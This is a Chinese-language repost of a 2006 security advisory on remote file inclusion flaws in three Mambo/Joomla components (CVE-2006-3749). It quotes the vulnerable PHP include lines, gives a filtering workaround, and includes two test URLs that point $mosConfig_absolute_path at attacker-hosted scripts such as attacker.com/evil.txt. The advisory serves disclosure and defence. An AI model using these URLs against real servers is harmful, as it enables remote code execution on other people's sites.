Mambo/Joomla多个组件远程文件包含漏洞
2008-04-09 04:19:00来源:互联网 阅读 ()
发布日期:2006-07-12
更新日期:2006-07-14
受影响系统:
Mambo com_hashcash 1.2.1描述:
Mambo ImageManager 1.5
Mambo Sitemap 2.0.0
BUGTRAQ ID: 18991
CVE(CAN) ID: CVE-2006-3749
Mambo(也被称为Joomla)是一款开放源代码的WEB内容管理系统。
Mambo的多个组件中存在远程文件包含漏洞,远程攻击者可能利用这些漏洞在服务器上以Web进程权限执行任意命令。
由于没有正确过滤$mosConfig_absolute_path变量,因此在register_globals=on和allow_fopenurl=on的配置情况下攻击者就可以使脚本包含远程服务器上的PHP代码执行。
漏洞相关的脚本及代码如下:
# Hashcash组件
在com_hashcash文件夹中server.php脚本存在漏洞:
-----------------------server.php---------------------------------------
<?php
include($."/administrator/components/com_hashcash/config.hashcash.php");
require_once ($mosConfig_absolute_path.'/components/com_hashcash/CryptoStrategy.php');
...................
------------------------------------------------------------------------
# HTMLArea3 addon - ImageManager
在ImageManager文件夹中config.inc.php脚本存在漏洞:
-----------------------config.inc.php-----------------------------------
<?php
// $Id: config.inc.php, v 1.5 2004/06/03 17:35:27 bpfeifer Exp $
/**
* HTMLArea3 addon - ImageManager
* Based on Wei Zhuo's ImageManager
* @package Mambo Open Source
* @Copyright 2004 Bernhard Pfeifer aka novocaine
* @ All rights reserved
* @ Released under GNU/GPL License : http://www.gnu.org/copyleft/gpl.html
* @version $Revision: 1.5 $
**/
require($mosConfig_absolute_path."/administrator/components/com_htmlarea3_xtd-c/config.htmlarea3_xtd-c.php");
------------------------------------------------------------------------
# Sitemap 2.0.0 for Mambo 4.5.1 CMS
在com_sitemap文件夹中sitemap.xml.php脚本存在漏洞:
-----------------------sitemap.xml.php----------------------
<?php
/**
* XML/XHTML menu system
* @package Mambo_4.5.1
* @copyright (C) 2000 - 2004 Miro International Pty Ltd
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
* Mambo is Free Software
* Author : Johan Janssens - johan@jinx.be (http://www.jinx.be)
**/
// XML library
require_once( $mosConfig_absolute_path . '/includes/domit/xml_domit_lite_include.php' );
------------------------------------------------------------
<*来源:Ahmad Maulana (matdhule@gmail.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=115280523322971&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://[target]/[path]/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://evilscript
http://[target]/[path]/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://attacker.com/evil.txt?
建议:
临时解决方法:
* 过滤$mosConfig_absolute_path变量。
厂商补丁:
Mambo
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://sourceforge.net/projects/mambo
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash